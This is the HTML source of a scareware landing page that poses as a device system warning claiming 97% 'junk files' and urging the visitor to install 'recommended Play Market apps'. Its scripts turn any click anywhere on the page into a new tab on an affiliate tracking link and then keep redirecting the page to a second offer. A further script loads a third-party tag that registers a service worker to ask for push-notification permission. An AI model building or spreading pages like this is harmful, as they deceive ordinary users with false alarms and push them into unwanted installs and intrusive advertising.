<!DOCTYPE html><html lang="en"><head>
  <base href="">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>A critical mass of junk files</title>
    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="./css2.css" rel="stylesheet">
    <style>
* {
  margin: 0;
  padding: 0;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
}
html,
body {
  width: 100%;
  height: 100%;
}
html {
  font-size: 16px;
}
body {
  font-family: 'Roboto', sans-serif;
  position: relative;
  background: #818181;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
      -ms-flex-pack: center;
          justify-content: center;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  padding: 15px;
}
.system_message {
  width: 100%;
  max-width: 400px;
  -webkit-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
          box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
  background: #fff;
}
.top_content {
  padding: 25px 25px;
}
.title {
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: start;
  -webkit-justify-content: flex-start;
      -ms-flex-pack: start;
          justify-content: flex-start;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
}
.title img {
  width: 48px;
  margin-right: 15px;
}
.title h1 {
  font-size: 1.4rem;
  font-weight: 500;
  color: #212121;
}
.progress_line {
  width: 100%;
  background: #d7d7d7;
  height: 8px;
  margin-bottom: 10px;
}
.progress_line .filled {
  background: #f44336;
  height: 100%;
  width: 97%;
}
.text {
  margin: 20px 0;
  color: #555555;
}
.needed {
  width: 100%;
  text-align: right;
  font-size: 0.8rem;
  color: #7d7d7d;
  margin-bottom: 16px;
  font-weight: 500;
}
.text_mini {
  font-size: 0.85rem;
  color: #9b9b9b;
}
.bottom_content {
  padding: 20px 25px;
  border-top: 1px solid #e8e8e8;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: end;
  -webkit-justify-content: flex-end;
      -ms-flex-pack: end;
          justify-content: flex-end;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
}
button {
  background: none;
  border: none;
  color: #c4c4c4;
  font-size: 1rem;
  font-weight: 700;
  text-transform: uppercase;
}
button:last-child {
  color: #37a9a3;
  margin-left: 25px;
}
/*************** media queries start ***********/
@media screen and (max-width: 840px) and (max-height: 440px) and (orientation: landscape) {
  body {
    padding: 5px;
    -webkit-box-align: start;
    -webkit-align-items: flex-start;
        -ms-flex-align: start;
            align-items: flex-start;
  }
  .system_message {
    max-width: 550px;
  }
  .top_content {
    padding: 12px 25px 15px;
  }
  .title img {
    width: 40px;
  }
  .title h1 {
    font-size: 1.3rem;
  }
  .text {
    margin: 12px 0 15px;
  }
  .progress_line {
    margin-bottom: 8px;
  }
  .needed {
    margin-bottom: 10px;
  }
  .bottom_content {
    padding: 15px 25px;
  }
}
@media screen and (max-width: 320px), screen and (max-width: 480px) and (orientation: landscape) {
  html {
    font-size: 15px;
  }
  body {
    padding: 5px;
  }
  .top_content {
    padding: 12px 20px 15px;
  }
  .text {
    margin: 12px 0 8px;
  }
  .needed {
    margin-bottom: 8px;
  }
}
/*************** media queries end ***********/

    </style>
</head>

<body onclick="ctaclick()">
    <div class="system_message">
        <div class="top_content">
            <div class="title">
                <img src="./ae24edc62ef70d255e195ba00c93586b.svg">
                <h1>Not enough space</h1>
            </div>
            <p class="text">A critical mass (97%) of junk files has accumulated in the device's memory. To continue, you need to clear the system</p>
            <div class="progress_line">
                <div class="filled"></div>
            </div>
            <p class="needed">249.5 MB needed</p>
            <p class="text_mini">Warning! Please don't clean the system by yourself. Use only recommended Play Market apps.</p>
        </div>
        <div class="bottom_content">
            <button>Cancel</button>
            <button>Continue</button>
        </div>
    </div>
<script>
      function ctaclick(){
        window.onbeforeunload = null;
        window.open("https://tk.besttrustedreview.com/click.php?lp=1&to_offer=1", "_blank");
        
        setInterval(afflowsmartlink, 1000);
      }
      
      function afflowsmartlink(){
        location.replace("https://tk.besttrustedreview.com/click.php?lp=1&to_offer=2");
      }
      
</script>

<script>
  var url = new URL(window.location.href);
  var pci = url.searchParams.get('clickid');
  var s = document.createElement('script');
  s.src='//bigrourg.net/pfe/current/micro.tag.min.js?z=4978561'+'&ymid='+pci+'&sw=/sw-check-permissions-3b3e2.js';
  s.onload = function(result) {
      switch (result) {
          case 'onPermissionDefault':break;
          case 'onPermissionAllowed':break;
          case 'onPermissionDenied':break;
          case 'onAlreadySubscribed':break;
          case 'onNotificationUnsupported':break;
      }
  }
  document.head.appendChild(s);
</script>

</body></html>